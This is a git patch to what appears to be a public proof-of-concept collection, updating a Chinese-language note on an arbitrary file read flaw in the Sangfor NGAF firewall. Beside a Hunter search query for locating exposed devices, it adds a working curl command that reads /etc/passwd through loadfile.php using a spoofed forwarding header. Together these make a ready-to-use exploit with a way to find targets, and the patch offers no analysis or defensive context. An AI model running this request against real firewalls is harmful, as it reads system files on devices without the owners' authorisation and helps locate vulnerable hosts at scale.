From edd472dbf88af68377cf4d271386c352ab3f8f4b Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Sat, 21 Oct 2023 20:32:25 +0800
Subject: [PATCH] =?UTF-8?q?Update=20=E6=B7=B1=E4=BF=A1=E6=9C=8D=E4=B8=8B?=
 =?UTF-8?q?=E4=B8=80=E4=BB=A3=E9=98=B2=E7=81=AB=E5=A2=99NGAF=E4=BB=BB?=
 =?UTF-8?q?=E6=84=8F=E6=96=87=E4=BB=B6=E8=AF=BB=E5=8F=96=E6=BC=8F=E6=B4=9E?=
 =?UTF-8?q?.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 深信服下一代防火墙NGAF任意文件读取漏洞.md | 5 +++++
 1 file changed, 5 insertions(+)

diff --git a/深信服下一代防火墙NGAF任意文件读取漏洞.md b/深信服下一代防火墙NGAF任意文件读取漏洞.md
index ca6bd06..5e8db3c 100644
--- a/深信服下一代防火墙NGAF任意文件读取漏洞.md
+++ b/深信服下一代防火墙NGAF任意文件读取漏洞.md
@@ -7,5 +7,10 @@
 ## hunter:
 web.body="LogInOut.php?type=logout"
 
+```
+curl --insecure  https://<host>:85/svpn_html/loadfile.php?file=/etc/./passwd -H "y-forwarded-for: 127.0.0.1"
+
+```
+
 ![](https://mmbiz.qpic.cn/sz_mmbiz_png/W3ujp2P7OjARkXD5FOjonOrfcK6Xr6QOVaCrI21fu9F1DcBPekwcPFBf8Q8vCrI4Qmiaia2YaMExoogwic2TSnNKQ/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1)